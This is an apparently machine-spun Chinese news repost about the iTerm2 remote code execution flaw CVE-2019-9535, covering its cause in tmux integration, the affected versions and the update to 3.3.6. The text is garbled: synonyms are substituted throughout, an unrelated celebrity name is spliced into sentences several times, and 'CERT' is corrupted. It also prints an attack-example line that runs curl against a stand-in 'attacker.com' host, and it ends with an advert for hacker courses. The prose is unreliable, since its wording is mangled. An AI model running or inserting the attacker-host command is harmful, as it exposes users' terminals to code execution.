加入收藏 | 设为首页 |

李贞贤-用Mac的同志请警觉!你或许做了黑客七年的肉鸡

海外新闻 时间: 浏览:214 次

由 网络安全公司 (ROS) 发布的审计李贞贤-用Mac的同志请警觉!你或许做了黑客七年的肉鸡成果显现, iTerm 2 中存在一个严峻的长途代码履行 (RCE) 缝隙,且至少已存在7年,知晓此缝隙的黑客,可以对存在缝隙的方针进行恣意操控。

iTerm 2 简介

iTerm2 是全球最抢手的终端模拟器之一,是开发人员常常运用的 MacOS 终端东西,是 Mac 内置终端 app 最有力的抢手开源东西替代品之一,被许多开发人员称为“Mac 终端利器”。

缝隙概述

CVE 编号:CVE-2019-9535。

该缝隙描绘:ROS 在iTerm2 的 tmux集成功用中找到了一个至少已存在7年之久的严峻缝隙。黑客如果能输出终端,则在许多情况下可以在方针核算机上履行指令。

进犯事例:使方针衔接到由进犯者操控的 SSH 服务器或其他歹意指令


curl http://attacker.com and tail -f /var/log/apache2/referer_log

Nachman 以为该缝隙影响的iTerm2 用户数量介于10万至20万之间。

Mozilla 公司的安全工程师 Tom Ritter 指出,这个缝隙源自 iTerm2 中的 tmux 集成功用。Tumx 应用程序是一款终端多路复用器,可答应从单个设备创立并操控多个终李贞贤-用Mac的同志请警觉!你或许做了黑客七年的肉鸡端。

C人皇ERT 和谐中心发布缝隙告诉表明,可经过运用指令行东西在终端屏幕上打印由进犯者操控的内容,然后使用该缝隙。该中心指出,“潜在的进犯向量包括经过 ssh 衔接至歹意服务器,经过curl 获取歹意网站,或许经过 tail –f 盯梢包括某些歹意内容的日李贞贤-用Mac的同志请警觉!你或许做了黑客七年的肉鸡志文件。”

一般情况下,该缝隙需求某些用户交互或手段才干遭触发,但由于它可经过通常被以为是安全的指令使用,因而它的潜在影响力巨大。

影响版别

该缝隙影响于本周早些时候发布的 3.3.5 版别及之前版李贞贤-用Mac的同志请警觉!你或许做了黑客七年的肉鸡别。

修正计划

现在补丁已发布但自动更新没有推送,立即在 iTerm2 目录中挑选“查看新版别”手动更新至最新版别 3.3.6,即可修正该缝隙啦!



安全黑客实时动态~ 欢迎重视

想成为黑客吗?黑客教程从零学~ 欢迎加zkaqbanban收取体会课 ~